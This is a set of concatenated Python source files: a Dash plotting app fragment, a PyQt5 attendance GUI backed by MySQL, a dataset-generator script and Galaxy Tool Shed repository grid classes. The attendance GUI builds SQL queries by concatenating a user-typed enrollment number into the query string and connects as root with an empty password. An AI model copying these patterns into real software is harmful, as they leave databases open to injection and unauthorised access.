trace["marker"]["line"]["width"] = 1
trace["type"] = "scatter"
for prop in trace:
fig["data"][i][prop] = trace[prop]
# Only show first 500 lines
fig["data"] = fig["data"][0:500]
fig_layout = fig["layout"]
# See plot.ly/python/reference
fig_layout["yaxis"]["title"] = "Age-adjusted death rate per county per year"
fig_layout["xaxis"]["title"] = ""
fig_layout["yaxis"]["fixedrange"] = True
fig_layout["xaxis"]["fixedrange"] = False
fig_layout["hovermode"] = "closest"
fig_layout["title"] = "<b>{0}</b> counties selected".format(len(fips))
fig_layout["legend"] = dict(orientation="v")
fig_layout["autosize"] = True
fig_layout["paper_bgcolor"] = "#1f2630"
fig_layout["plot_bgcolor"] = "#1f2630"
fig_layout["font"]["color"] = "#2cfec1"
fig_layout["xaxis"]["tickfont"]["color"] = "#2cfec1"
fig_layout["yaxis"]["tickfont"]["color"] = "#2cfec1"
fig_layout["xaxis"]["gridcolor"] = "#5b5b5b"
fig_layout["yaxis"]["gridcolor"] = "#5b5b5b"
if len(fips) > 500:
fig["layout"][
"title"
] = "Age-adjusted death rate per county per year <br>(only 1st 500 shown)"
return fig
if __name__ == "__main__":
app.run_server(debug=True)
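# Running locally (assumption): executing this file starts the Dash development server,
# which serves the app at http://127.0.0.1:8050/ by default.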
|
py | 7df7ffe0c0e948946cc66a2710b0f245aaaffc5e | # -*- coding: utf-8 -*-
# Form implementation generated from reading ui file 'subjecttoteacher.ui'
#
# Created by: PyQt5 UI code generator 5.13.0
#
# WARNING! All changes made in this file will be lost!
from distutils.log import Log
import mysql.connector
from mysql.connector import Error , errorcode
from PyQt5.QtWidgets import (QApplication, QMainWindow)
from tests import Ui_Chart
from errdilog import Ui_Dialog
from PyQt5 import QtCore, QtGui, QtWidgets
from PyQt5.QtGui import QIcon, QPixmap
class Ui_Form(object):
def setupUi(self, Form):
Form.setObjectName("Form")
Form.resize(616, 477)
self.Submitdetails = QtWidgets.QPushButton(Form)
self.Submitdetails.setGeometry(QtCore.QRect(260, 320, 75, 23))
self.Submitdetails.setObjectName("Submitdetails")
self.Logo_2 = QtWidgets.QLabel(Form)
self.Logo_2.setGeometry(QtCore.QRect(240, 30, 100, 110))
self.Logo_2.setText("")
self.Logo_2.setObjectName("Logo_2")
pixmap = QPixmap('faceAttend.png')
self.Logo_2.setPixmap(pixmap)
self.ForEnroll = QtWidgets.QRadioButton(Form)
self.ForEnroll.setGeometry(QtCore.QRect(210, 175, 16, 16))
self.ForEnroll.setText("")
self.ForEnroll.setObjectName("ForEnroll")
self.Enroll = QtWidgets.QLineEdit(Form)
self.Enroll.setGeometry(QtCore.QRect(240, 170, 110, 20))
self.Enroll.setObjectName("Enroll")
self.Enroll.setPlaceholderText(" Enrollment Number")
self.ForRollnum = QtWidgets.QRadioButton(Form)
self.ForRollnum.setGeometry(QtCore.QRect(210, 225, 16, 16))
self.ForRollnum.setText("")
self.ForRollnum.setObjectName("ForRollnum")
self.StudentRollNum = QtWidgets.QComboBox(Form)
self.StudentRollNum.setGeometry(QtCore.QRect(240, 220, 110, 21))
self.StudentRollNum.setObjectName("StudentRollNum")
self.Semester = QtWidgets.QComboBox(Form)
self.Semester.setGeometry(QtCore.QRect(240, 260, 110, 21))
self.Semester.setObjectName("Semester")
self.retranslateUi(Form)
self.loaddata()
QtCore.QMetaObject.connectSlotsByName(Form)
self.Submitdetails.clicked.connect(self.studentdet)
def retranslateUi(self, Form):
_translate = QtCore.QCoreApplication.translate
Form.setWindowTitle(_translate("Form", "Form"))
self.Submitdetails.setText(_translate("Form", "Search"))
self.Semester.addItem("mca1")
self.Semester.addItem("mca2")
self.Semester.addItem("mca3")
self.Semester.addItem("mca4")
self.Semester.addItem("mca5")
self.Semester.addItem("mca6")
def loaddata(self):
for x in range(1,11):
self.StudentRollNum.addItem(str(x))
# mydb = mysql.connector.connect(
# host="localhost",
# user="root",
# database="collegeattend",
# passwd=""
# )
# mycursor = mydb.cursor()
# mycursor.execute("SELECT name FROM studentdetails")
# myresult = mycursor.fetchall()
# for row in myresult:
# self.StudentRollNum.addItem(row[0])
def studentdet(self):
if self.ForEnroll.isChecked() == True:
if str(self.Enroll.text()) != "":
try:
mydb = mysql.connector.connect(
host="localhost",
user="root",
database="collegeattend",
passwd=""
)
mycursor = mydb.cursor()
mycursor.execute("SELECT * FROM studentdetails where enrollement = "+str(self.Enroll.text()))
myresult = mycursor.fetchone()
if myresult is None:
self.ERrCall()
else:
self.RollNUM = myresult[0]
self.ListSEM = myresult[5]
for x in myresult:
print(x)
except mysql.connector.Error as e:
print(e.errno)
print(e.sqlstate)
print("Error from Def Student Enoll".format(e))
else:
self.ERrCall()
elif self.ForRollnum.isChecked() == True:
try:
mydatabase = mysql.connector.connect(
host="localhost",
user="root",
database="collegeattend",
passwd=""
)
cursor = mydatabase.cursor()
sql = "SELECT * FROM `studentdetails` where rollnum = " + str(self.StudentRollNum.currentText()) + " and semester = '" + str(self.Semester.currentText())+"'"
print(sql)
cursor.execute(sql)
result = cursor.fetchone()
if result is None:
self.ERrCall()
else:
self.RollNUM = result[0]
self.ListSEM = result[5]
for x in result:
print(x)
self.FindSub()
except mysql.connector.Error as e:
print(e.errno)
print(e.sqlstate)
print("Error from Def Student combo Box".format(e))
else:
self.ERrCall()
def FindSub(self):
self.ListSubj = []
try:
mydatabase = mysql.connector.connect(
host="localhost",
user="root",
database="collegeattend",
passwd=""
)
cursor = mydatabase.cursor()
sql = "SELECT subject1,subject2,subject3,subject4,subject5,subject6,subject7 FROM `collgdatatable` where semestername= '" + str(self.ListSEM) + "'"
print(sql)
cursor.execute(sql)
result = cursor.fetchone()
if result is None:
self.ERrCall()
else:
for x in result:
self.ListSubj.append(str(x))
# print(len(self.ListSubj))
# for i in range(len(self.ListSubj)):
# print(self.ListSubj[i])
self.AvgSem()
except mysql.connector.Error as e:
print(e.errno)
print(e.sqlstate)
print("Error from Def FindSUb ".format(e))
def AvgSem(self):
self.SutTotalAttd = []
self.ToTalClass = []
for i in range(7):
try:
mydatabase = mysql.connector.connect(
host="localhost",
user="root",
database="collegeattend",
passwd=""
)
cursor = mydatabase.cursor()
sql = "SELECT COUNT(`"+str(self.RollNUM)+"`) FROM `"+str(self.ListSubj[i])+"` where `"+str(self.RollNUM)+"` = '1'"
print(sql)
cursor.execute(sql)
result = cursor.fetchone()
if result is None:
self.SutTotalAttd.append(str("Not"))
else:
for x in result:
self.SutTotalAttd.append(str(result[0]))
except mysql.connector.Error as e:
print(e.errno)
print(e.sqlstate)
print("Error from Def Avg and student total".format(e))
for i in range(7):
try:
mydatabase = mysql.connector.connect(
host="localhost",
user="root",
database="collegeattend",
passwd=""
)
cursor = mydatabase.cursor()
sql = "SELECT COUNT(`classdate`) FROM `"+str(self.ListSubj[i])+"`"
print(sql)
cursor.execute(sql)
result = cursor.fetchone()
if result is None:
self.ToTalClass.append(str("hot"))
else:
for x in result:
self.ToTalClass.append(str(result[0]))
except mysql.connector.Error as e:
print(e.errno)
print(e.sqlstate)
print("Error from Def Avg Total block".format(e))
print(len(self.ToTalClass))
print(len(self.SutTotalAttd))
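# Note: if a subject has no recorded class dates yet, the corresponding ToTalClass entry is
# "0" and the division below raises ZeroDivisionError; a guard (e.g. reporting 0%) may be needed.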
self.Percentage = []
print("total class")
for j in range(len(self.ToTalClass)):
self.Percentage.append(int(self.SutTotalAttd[j])/int(self.ToTalClass[j])*100)
print("student Present")
for k in range(len(self.Percentage)):
print(self.Percentage[k])
self.window = QtWidgets.QMainWindow()
self.ui = Ui_Chart(self.Percentage,self.ListSubj)
self.ui.setupUi(self.window)
self.window.show()
def Outstring(self):
return self.Percentage
def ERrCall(self):
self.dilog = QtWidgets.QDialog()
self.dl = Ui_Dialog()
self.dl.setupUi(self.dilog)
self.dilog.show()
if __name__ == "__main__":
import sys
app = QtWidgets.QApplication(sys.argv)
Form = QtWidgets.QWidget()
ui = Ui_Form()
ui.setupUi(Form)
Form.show()
sys._excepthook = sys.excepthook
def my_exception_hook(exctype, value, traceback):
# Print the error and traceback
print(exctype, value, traceback)
# Call the normal Exception hook after
sys._excepthook(exctype, value, traceback)
sys.exit(1)
# Set the exception hook to our wrapping function
sys.excepthook = my_exception_hook
sys.exit(app.exec_())
|
py | 7df8004e0a78a89ffca7409b98aea6a207e5dcbf | from os.path import join
import argparse
from .potsdam import (
POTSDAM, PotsdamImageFileGenerator, PotsdamNumpyFileGenerator)
from .vaihingen import (
VAIHINGEN, VaihingenImageFileGenerator, VaihingenNumpyFileGenerator)
from .generators import NUMPY, IMAGE, TRAIN, VALIDATION
from .utils import _makedirs, plot_sample
from .settings import datasets_path, results_path
def get_data_generator(options, datasets_path):
if options.dataset_name == POTSDAM:
if options.generator_name == NUMPY:
return PotsdamNumpyFileGenerator(
datasets_path, options.active_input_inds,
options.train_ratio, options.cross_validation)
elif options.generator_name == IMAGE:
return PotsdamImageFileGenerator(
datasets_path, options.active_input_inds,
options.train_ratio, options.cross_validation)
else:
raise ValueError('{} is not a valid generator'.format(
options.generator_name))
elif options.dataset_name == VAIHINGEN:
if options.generator_name == IMAGE:
return VaihingenImageFileGenerator(
datasets_path,
options.include_depth, options.include_ndvi,
options.train_ratio)
elif options.generator_name == NUMPY:
return VaihingenNumpyFileGenerator(
datasets_path,
options.include_depth, options.include_ndvi,
options.train_ratio)
else:
raise ValueError('{} is not a valid generator'.format(
options.generator_name))
else:
raise ValueError('{} is not a valid dataset'.format(
options.dataset_name))
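# Minimal usage sketch (assumed attribute values; any object exposing these attributes works
# as `options`, e.g. an argparse.Namespace):
#
#     from argparse import Namespace
#     options = Namespace(dataset_name=POTSDAM, generator_name=NUMPY,
#                         active_input_inds=[0, 1, 2, 3], train_ratio=0.8,
#                         cross_validation=None)
#     generator = get_data_generator(options, datasets_path)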
def plot_generator(dataset_name, generator_name, split):
nb_batches = 2
batch_size = 4
class Options():
def __init__(self):
self.dataset_name = dataset_name
self.generator_name = generator_name
self.include_ir = True
self.include_depth = True
self.include_ndvi = True
self.train_ratio = 0.7
options = Options()
generator = get_data_generator(options, datasets_path)
viz_path = join(
results_path, 'gen_samples', dataset_name, generator_name, split)
_makedirs(viz_path)
gen = generator.make_split_generator(
TRAIN, target_size=(400, 400), batch_size=batch_size, shuffle=True,
augment=True, normalize=True, eval_mode=True)
for batch_ind in range(nb_batches):
_, batch_y, all_batch_x, _, _ = next(gen)
for sample_ind in range(batch_size):
file_path = join(
viz_path, '{}_{}.pdf'.format(batch_ind, sample_ind))
plot_sample(
file_path, all_batch_x[sample_ind, :, :, :],
batch_y[sample_ind, :, :, :], generator)
def preprocess():
VaihingenImageFileGenerator.preprocess(datasets_path)
VaihingenNumpyFileGenerator.preprocess(datasets_path)
PotsdamImageFileGenerator.preprocess(datasets_path)
PotsdamNumpyFileGenerator.preprocess(datasets_path)
def plot_generators():
plot_generator(VAIHINGEN, IMAGE, TRAIN)
plot_generator(VAIHINGEN, IMAGE, VALIDATION)
plot_generator(VAIHINGEN, NUMPY, TRAIN)
plot_generator(VAIHINGEN, NUMPY, VALIDATION)
plot_generator(POTSDAM, IMAGE, TRAIN)
plot_generator(POTSDAM, IMAGE, VALIDATION)
plot_generator(POTSDAM, NUMPY, TRAIN)
plot_generator(POTSDAM, NUMPY, VALIDATION)
def parse_args():
parser = argparse.ArgumentParser()
parser.add_argument(
'--preprocess',
action='store_true', help='run preprocessing for all generators')
parser.add_argument(
'--plot',
action='store_true', help='plot all generators')
return parser.parse_args()
if __name__ == '__main__':
args = parse_args()
if args.preprocess:
preprocess()
if args.plot:
plot_generators()
|
py | 7df800a4409bb67671706dc9a4e7df107b58fbc7 | import json
import logging
from markupsafe import escape as escape_html
from sqlalchemy import (
and_,
false,
or_,
true,
)
import tool_shed.grids.util as grids_util
import tool_shed.repository_types.util as rt_util
import tool_shed.util.shed_util_common as suc
from galaxy.web.legacy_framework import grids
from tool_shed.util import (
hg_util,
metadata_util,
repository_util,
)
from tool_shed.webapp import model
log = logging.getLogger(__name__)
class CategoryGrid(grids.Grid):
class NameColumn(grids.TextColumn):
def get_value(self, trans, grid, category):
return category.name
class DescriptionColumn(grids.TextColumn):
def get_value(self, trans, grid, category):
return category.description
class RepositoriesColumn(grids.TextColumn):
def get_value(self, trans, grid, category):
category_name = str(category.name)
filter = trans.app.repository_grid_filter_manager.get_filter(trans)
if filter == trans.app.repository_grid_filter_manager.filters.CERTIFIED_LEVEL_ONE:
return (
trans.app.repository_registry.certified_level_one_viewable_repositories_and_suites_by_category.get(
category_name, 0
)
)
elif filter == trans.app.repository_grid_filter_manager.filters.CERTIFIED_LEVEL_ONE_SUITES:
return trans.app.repository_registry.certified_level_one_viewable_suites_by_category.get(
category_name, 0
)
elif filter == trans.app.repository_grid_filter_manager.filters.SUITES:
return trans.app.repository_registry.viewable_suites_by_category.get(category_name, 0)
else:
# The value filter is None.
return trans.app.repository_registry.viewable_repositories_and_suites_by_category.get(category_name, 0)
title = "Categories"
model_class = model.Category
template = "/webapps/tool_shed/category/grid.mako"
default_sort_key = "name"
columns = [
NameColumn(
"Name",
key="Category.name",
link=(lambda item: dict(operation="repositories_by_category", id=item.id)),
attach_popup=False,
),
DescriptionColumn("Description", key="Category.description", attach_popup=False),
RepositoriesColumn("Repositories", model_class=model.Repository, attach_popup=False),
]
# Override these
num_rows_per_page = 50
class RepositoryGrid(grids.Grid):
class NameColumn(grids.TextColumn):
def get_value(self, trans, grid, repository):
return escape_html(repository.name)
class TypeColumn(grids.TextColumn):
def get_value(self, trans, grid, repository):
type_class = repository.get_type_class(trans.app)
return escape_html(type_class.label)
class HeadsColumn(grids.GridColumn):
def __init__(self, col_name):
grids.GridColumn.__init__(self, col_name)
def get_value(self, trans, grid, repository):
"""Display the current repository heads."""
repo = repository.hg_repo
heads = hg_util.get_repository_heads(repo)
multiple_heads = len(heads) > 1
if multiple_heads:
heads_str = '<font color="red">'
else:
heads_str = ""
for ctx in heads:
heads_str += f"{hg_util.get_revision_label_from_ctx(ctx, include_date=True)}<br/>"
            heads_str = heads_str.rstrip("<br/>")
if multiple_heads:
heads_str += "</font>"
return heads_str
class MetadataRevisionColumn(grids.GridColumn):
def __init__(self, col_name):
grids.GridColumn.__init__(self, col_name)
def get_value(self, trans, grid, repository):
"""Display a SelectField whose options are the changeset_revision strings of all metadata revisions of this repository."""
# A repository's metadata revisions may not all be installable, as some may contain only invalid tools.
select_field = grids_util.build_changeset_revision_select_field(trans, repository, downloadable=False)
if len(select_field.options) > 1:
tmpl = f"<select name='{select_field.name}'>"
for o in select_field.options:
tmpl += f"<option value='{o[1]}'>{o[0]}</option>"
tmpl += "</select>"
return tmpl
elif len(select_field.options) == 1:
option_items = select_field.options[0][0]
rev_label, rev_date = option_items.split(" ")
rev_date = f'<i><font color="#666666">{rev_date}</font></i>'
return f"{rev_label} {rev_date}"
return ""
class LatestInstallableRevisionColumn(grids.GridColumn):
def __init__(self, col_name):
grids.GridColumn.__init__(self, col_name)
def get_value(self, trans, grid, repository):
"""Display the latest installable revision label (may not be the repository tip)."""
select_field = grids_util.build_changeset_revision_select_field(trans, repository, downloadable=False)
if select_field.options:
return select_field.options[0][0]
return ""
class TipRevisionColumn(grids.GridColumn):
def __init__(self, col_name):
grids.GridColumn.__init__(self, col_name)
def get_value(self, trans, grid, repository):
"""Display the repository tip revision label."""
return escape_html(repository.revision())
class DescriptionColumn(grids.TextColumn):
def get_value(self, trans, grid, repository):
return escape_html(repository.description)
class CategoryColumn(grids.TextColumn):
def get_value(self, trans, grid, repository):
rval = "<ul>"
if repository.categories:
for rca in repository.categories:
rval += f'<li><a href="browse_repositories?operation=repositories_by_category&id={trans.security.encode_id(rca.category.id)}">{rca.category.name}</a></li>'
else:
rval += "<li>not set</li>"
rval += "</ul>"
return rval
class RepositoryCategoryColumn(grids.GridColumn):
def filter(self, trans, user, query, column_filter):
"""Modify query to filter by category."""
if column_filter == "All":
return query
return query.filter(model.Category.name == column_filter)
class UserColumn(grids.TextColumn):
def get_value(self, trans, grid, repository):
if repository.user:
return escape_html(repository.user.username)
return "no user"
class EmailColumn(grids.TextColumn):
def filter(self, trans, user, query, column_filter):
if column_filter == "All":
return query
return query.filter(
and_(
model.Repository.table.c.user_id == model.User.table.c.id, model.User.table.c.email == column_filter
)
)
class EmailAlertsColumn(grids.TextColumn):
def get_value(self, trans, grid, repository):
if trans.user and repository.email_alerts and trans.user.email in json.loads(repository.email_alerts):
return "yes"
return ""
class DeprecatedColumn(grids.TextColumn):
def get_value(self, trans, grid, repository):
if repository.deprecated:
return "yes"
return ""
title = "Repositories"
model_class = model.Repository
default_sort_key = "name"
use_hide_message = False
columns = [
NameColumn(
"Name",
key="name",
link=(lambda item: dict(operation="view_or_manage_repository", id=item.id)),
attach_popup=False,
),
DescriptionColumn("Synopsis", key="description", attach_popup=False),
TypeColumn("Type"),
MetadataRevisionColumn("Metadata<br/>Revisions"),
UserColumn(
"Owner",
model_class=model.User,
link=(lambda item: dict(operation="repositories_by_user", id=item.id)),
attach_popup=False,
key="User.username",
),
# Columns that are valid for filtering but are not visible.
EmailColumn("Email", model_class=model.User, key="email", visible=False),
RepositoryCategoryColumn("Category", model_class=model.Category, key="Category.name", visible=False),
]
columns.append(
grids.MulticolFilterColumn(
"Search repository name, description",
cols_to_filter=[columns[0], columns[1]],
key="free-text-search",
visible=False,
filterable="standard",
)
)
default_filter = dict(deleted="False")
num_rows_per_page = 50
use_paging = True
allow_fetching_all_results = False
def build_initial_query(self, trans, **kwd):
filter = trans.app.repository_grid_filter_manager.get_filter(trans)
if filter == trans.app.repository_grid_filter_manager.filters.CERTIFIED_LEVEL_ONE:
return (
trans.sa_session.query(model.Repository)
.join(model.RepositoryMetadata.table)
.filter(or_(*trans.app.repository_registry.certified_level_one_clause_list))
.join(model.User.table)
.outerjoin(model.RepositoryCategoryAssociation.table)
.outerjoin(model.Category.table)
)
if filter == trans.app.repository_grid_filter_manager.filters.CERTIFIED_LEVEL_ONE_SUITES:
return (
trans.sa_session.query(model.Repository)
.filter(model.Repository.type == rt_util.REPOSITORY_SUITE_DEFINITION)
.join(model.RepositoryMetadata.table)
.filter(or_(*trans.app.repository_registry.certified_level_one_clause_list))
.join(model.User.table)
.outerjoin(model.RepositoryCategoryAssociation.table)
.outerjoin(model.Category.table)
)
else:
# The filter is None.
return (
trans.sa_session.query(model.Repository)
.filter(
and_(model.Repository.table.c.deleted == false(), model.Repository.table.c.deprecated == false())
)
.join(model.User.table)
.outerjoin(model.RepositoryCategoryAssociation.table)
.outerjoin(model.Category.table)
)
class DockerImageGrid(RepositoryGrid):
columns = [
RepositoryGrid.NameColumn(
"Name",
key="name",
link=(lambda item: dict(operation="view_or_manage_repository", id=item.id)),
attach_popup=False,
),
RepositoryGrid.DescriptionColumn("Synopsis", key="description", attach_popup=False),
RepositoryGrid.UserColumn(
"Owner",
model_class=model.User,
link=(lambda item: dict(operation="repositories_by_user", id=item.id)),
attach_popup=False,
key="User.username",
),
RepositoryGrid.EmailAlertsColumn("Alert", attach_popup=False),
]
operations = [grids.GridOperation("Include in Docker image", allow_multiple=True)]
show_item_checkboxes = True
class EmailAlertsRepositoryGrid(RepositoryGrid):
columns = [
RepositoryGrid.NameColumn(
"Name",
key="name",
link=(lambda item: dict(operation="view_or_manage_repository", id=item.id)),
attach_popup=False,
),
RepositoryGrid.DescriptionColumn("Synopsis", key="description", attach_popup=False),
RepositoryGrid.UserColumn(
"Owner",
model_class=model.User,
link=(lambda item: dict(operation="repositories_by_user", id=item.id)),
attach_popup=False,
key="User.username",
),
RepositoryGrid.EmailAlertsColumn("Alert", attach_popup=False),
# Columns that are valid for filtering but are not visible.
grids.DeletedColumn("Deleted", key="deleted", visible=False, filterable="advanced"),
]
operations = [grids.GridOperation("Receive email alerts", allow_multiple=True)]
global_actions = [
grids.GridAction("User preferences", dict(controller="user", action="index", cntrller="repository"))
]
class MatchedRepositoryGrid(grids.Grid):
# This grid filters out repositories that have been marked as deleted or deprecated.
class NameColumn(grids.TextColumn):
def get_value(self, trans, grid, repository_metadata):
return escape_html(repository_metadata.repository.name)
class DescriptionColumn(grids.TextColumn):
def get_value(self, trans, grid, repository_metadata):
return escape_html(repository_metadata.repository.description)
class RevisionColumn(grids.TextColumn):
def get_value(self, trans, grid, repository_metadata):
return repository_metadata.changeset_revision
class UserColumn(grids.TextColumn):
def get_value(self, trans, grid, repository_metadata):
if repository_metadata.repository.user:
return escape_html(repository_metadata.repository.user.username)
return "no user"
# Grid definition
title = "Matching repositories"
model_class = model.RepositoryMetadata
default_sort_key = "Repository.name"
use_hide_message = False
columns = [
NameColumn(
"Repository name",
link=(lambda item: dict(operation="view_or_manage_repository", id=item.id)),
attach_popup=True,
),
DescriptionColumn("Synopsis", attach_popup=False),
RevisionColumn("Revision"),
UserColumn("Owner", model_class=model.User, attach_popup=False),
]
operations = [grids.GridOperation("Install to Galaxy", allow_multiple=True)]
num_rows_per_page = 50
use_paging = False
def build_initial_query(self, trans, **kwd):
match_tuples = kwd.get("match_tuples", [])
clause_list = []
if match_tuples:
for match_tuple in match_tuples:
repository_id, changeset_revision = match_tuple
clause_list.append(
and_(
model.RepositoryMetadata.repository_id == int(repository_id),
model.RepositoryMetadata.changeset_revision == changeset_revision,
)
)
return (
trans.sa_session.query(model.RepositoryMetadata)
.join(model.Repository)
.filter(
and_(model.Repository.table.c.deleted == false(), model.Repository.table.c.deprecated == false())
)
.join(model.User.table)
.filter(or_(*clause_list))
.order_by(model.Repository.name)
)
# Return an empty query
return trans.sa_session.query(model.RepositoryMetadata).filter(model.RepositoryMetadata.id < 0)
class InstallMatchedRepositoryGrid(MatchedRepositoryGrid):
columns = [col for col in MatchedRepositoryGrid.columns]
# Override the NameColumn
columns[0] = MatchedRepositoryGrid.NameColumn(
"Name", link=(lambda item: dict(operation="view_or_manage_repository", id=item.id)), attach_popup=False
)
class MyWritableRepositoriesGrid(RepositoryGrid):
# This grid filters out repositories that have been marked as either deprecated or deleted.
title = "Repositories I can change"
columns = [
RepositoryGrid.NameColumn(
"Name",
key="name",
link=(lambda item: dict(operation="view_or_manage_repository", id=item.id)),
attach_popup=False,
),
RepositoryGrid.TypeColumn("Type"),
RepositoryGrid.MetadataRevisionColumn("Metadata<br/>Revisions"),
RepositoryGrid.UserColumn(
"Owner",
model_class=model.User,
link=(lambda item: dict(operation="repositories_by_user", id=item.id)),
attach_popup=False,
key="User.username",
),
]
columns.append(
grids.MulticolFilterColumn(
"Search repository name",
cols_to_filter=[columns[0]],
key="free-text-search",
visible=False,
filterable="standard",
)
)
def build_initial_query(self, trans, **kwd):
# TODO: improve performance by adding a db table associating users with repositories for which they have write access.
username = trans.user.username
clause_list = []
for repository in trans.sa_session.query(model.Repository).filter(
and_(model.Repository.table.c.deprecated == false(), model.Repository.table.c.deleted == false())
):
allow_push = repository.allow_push()
if allow_push:
allow_push_usernames = allow_push.split(",")
if username in allow_push_usernames:
clause_list.append(model.Repository.table.c.id == repository.id)
if clause_list:
return trans.sa_session.query(model.Repository).filter(or_(*clause_list)).join(model.User.table)
# Return an empty query.
return trans.sa_session.query(model.Repository).filter(model.Repository.table.c.id < 0)
class RepositoriesByUserGrid(RepositoryGrid):
title = "Repositories by user"
columns = [
RepositoryGrid.NameColumn(
"Name",
key="name",
link=(lambda item: dict(operation="view_or_manage_repository", id=item.id)),
attach_popup=False,
),
RepositoryGrid.DescriptionColumn("Synopsis", key="description", attach_popup=False),
RepositoryGrid.TypeColumn("Type"),
RepositoryGrid.MetadataRevisionColumn("Metadata<br/>Revisions"),
RepositoryGrid.CategoryColumn("Category", model_class=model.Category, key="Category.name", attach_popup=False),
]
default_filter = dict(deleted="False")
def build_initial_query(self, trans, **kwd):
decoded_user_id = trans.security.decode_id(kwd["user_id"])
filter = trans.app.repository_grid_filter_manager.get_filter(trans)
if filter == trans.app.repository_grid_filter_manager.filters.CERTIFIED_LEVEL_ONE:
return (
trans.sa_session.query(model.Repository)
.filter(model.Repository.table.c.user_id == decoded_user_id)
.join(model.RepositoryMetadata.table)
.filter(or_(*trans.app.repository_registry.certified_level_one_clause_list))
.join(model.User.table)
.outerjoin(model.RepositoryCategoryAssociation.table)
.outerjoin(model.Category.table)
)
if filter == trans.app.repository_grid_filter_manager.filters.CERTIFIED_LEVEL_ONE_SUITES:
return (
trans.sa_session.query(model.Repository)
.filter(
and_(
model.Repository.type == rt_util.REPOSITORY_SUITE_DEFINITION,
model.Repository.table.c.user_id == decoded_user_id,
)
)
.join(model.RepositoryMetadata.table)
.filter(or_(*trans.app.repository_registry.certified_level_one_clause_list))
.join(model.User.table)
.outerjoin(model.RepositoryCategoryAssociation.table)
.outerjoin(model.Category.table)
)
else:
# The value of filter is None.
return (
trans.sa_session.query(model.Repository)
.filter(
and_(
model.Repository.table.c.deleted == false(),
model.Repository.table.c.deprecated == false(),
model.Repository.table.c.user_id == decoded_user_id,
)
)
.join(model.User.table)
.outerjoin(model.RepositoryCategoryAssociation.table)
.outerjoin(model.Category.table)
)
class RepositoriesInCategoryGrid(RepositoryGrid):
title = "Category"
columns = [
RepositoryGrid.NameColumn(
"Name",
key="name",
link=(lambda item: dict(controller="repository", operation="view_or_manage_repository", id=item.id)),
attach_popup=False,
),
RepositoryGrid.DescriptionColumn("Synopsis", key="description", attach_popup=False),
RepositoryGrid.TypeColumn("Type"),
RepositoryGrid.MetadataRevisionColumn("Metadata<br/>Revisions"),
RepositoryGrid.UserColumn(
"Owner",
model_class=model.User,
link=(lambda item: dict(controller="repository", operation="repositories_by_user", id=item.id)),
attach_popup=False,
key="User.username",
),
# Columns that are valid for filtering but are not visible.
RepositoryGrid.EmailColumn("Email", model_class=model.User, key="email", visible=False),
]
columns.append(
grids.MulticolFilterColumn(
"Search repository name, description",
cols_to_filter=[columns[0], columns[1]],
key="free-text-search",
visible=False,
filterable="standard",
)
)
def build_initial_query(self, trans, **kwd):
category_id = kwd.get("id", None)
filter = trans.app.repository_grid_filter_manager.get_filter(trans)
if filter == trans.app.repository_grid_filter_manager.filters.CERTIFIED_LEVEL_ONE:
if category_id:
category = suc.get_category(trans.app, category_id)
if category:
return (
trans.sa_session.query(model.Repository)
.join(model.RepositoryMetadata.table)
.filter(or_(*trans.app.repository_registry.certified_level_one_clause_list))
.join(model.User.table)
.outerjoin(model.RepositoryCategoryAssociation.table)
.outerjoin(model.Category.table)
.filter(model.Category.table.c.name == category.name)
)
return (
trans.sa_session.query(model.Repository)
.join(model.RepositoryMetadata.table)
.filter(or_(*trans.app.repository_registry.certified_level_one_clause_list))
.join(model.User.table)
.outerjoin(model.RepositoryCategoryAssociation.table)
.outerjoin(model.Category.table)
)
if filter == trans.app.repository_grid_filter_manager.filters.CERTIFIED_LEVEL_ONE_SUITES:
if category_id:
category = suc.get_category(trans.app, category_id)
if category:
return (
trans.sa_session.query(model.Repository)
.filter(model.Repository.type == rt_util.REPOSITORY_SUITE_DEFINITION)
.join(model.RepositoryMetadata.table)
.filter(or_(*trans.app.repository_registry.certified_level_one_clause_list))
.join(model.User.table)
.outerjoin(model.RepositoryCategoryAssociation.table)
.outerjoin(model.Category.table)
.filter(model.Category.table.c.name == category.name)
)
return (
trans.sa_session.query(model.Repository)
.filter(model.Repository.type == rt_util.REPOSITORY_SUITE_DEFINITION)
.join(model.RepositoryMetadata.table)
.filter(or_(*trans.app.repository_registry.certified_level_one_clause_list))
.join(model.User.table)
.outerjoin(model.RepositoryCategoryAssociation.table)
.outerjoin(model.Category.table)
)
else:
# The value of filter is None.
if category_id:
category = suc.get_category(trans.app, category_id)
if category:
return (
trans.sa_session.query(model.Repository)
.filter(
and_(
model.Repository.table.c.deleted == false(),
model.Repository.table.c.deprecated == false(),
)
)
.join(model.User.table)
.outerjoin(model.RepositoryCategoryAssociation.table)
.outerjoin(model.Category.table)
.filter(model.Category.table.c.name == category.name)
)
return (
trans.sa_session.query(model.Repository)
.filter(
and_(model.Repository.table.c.deleted == false(), model.Repository.table.c.deprecated == false())
)
.join(model.User.table)
.outerjoin(model.RepositoryCategoryAssociation.table)
.outerjoin(model.Category.table)
)
class RepositoriesIOwnGrid(RepositoryGrid):
title = "Repositories I own"
columns = [
RepositoryGrid.NameColumn(
"Name",
key="name",
link=(lambda item: dict(operation="view_or_manage_repository", id=item.id)),
attach_popup=False,
),
RepositoryGrid.TypeColumn("Type"),
RepositoryGrid.MetadataRevisionColumn("Metadata<br/>Revisions"),
RepositoryGrid.DeprecatedColumn("Deprecated"),
]
columns.append(
grids.MulticolFilterColumn(
"Search repository name",
cols_to_filter=[columns[0]],
key="free-text-search",
visible=False,
filterable="standard",
)
)
def build_initial_query(self, trans, **kwd):
return (
trans.sa_session.query(model.Repository)
.filter(
and_(model.Repository.table.c.deleted == false(), model.Repository.table.c.user_id == trans.user.id)
)
.join(model.User.table)
.outerjoin(model.RepositoryCategoryAssociation.table)
.outerjoin(model.Category.table)
)
class RepositoriesICanAdministerGrid(RepositoryGrid):
title = "Repositories I can administer"
columns = [
RepositoryGrid.NameColumn(
"Name",
key="name",
link=(lambda item: dict(operation="view_or_manage_repository", id=item.id)),
attach_popup=False,
),
RepositoryGrid.UserColumn("Owner"),
RepositoryGrid.MetadataRevisionColumn("Metadata<br/>Revisions"),
RepositoryGrid.DeprecatedColumn("Deprecated"),
]
columns.append(
grids.MulticolFilterColumn(
"Search repository name",
cols_to_filter=[columns[0]],
key="free-text-search",
visible=False,
filterable="standard",
)
)
def build_initial_query(self, trans, **kwd):
"""
Retrieve all repositories for which the current user has been granted administrative privileges.
"""
current_user = trans.user
# Build up an or-based clause list containing role table records.
clause_list = []
# Include each of the user's roles.
for ura in current_user.roles:
clause_list.append(model.Role.table.c.id == ura.role_id)
# Include each role associated with each group of which the user is a member.
for uga in current_user.groups:
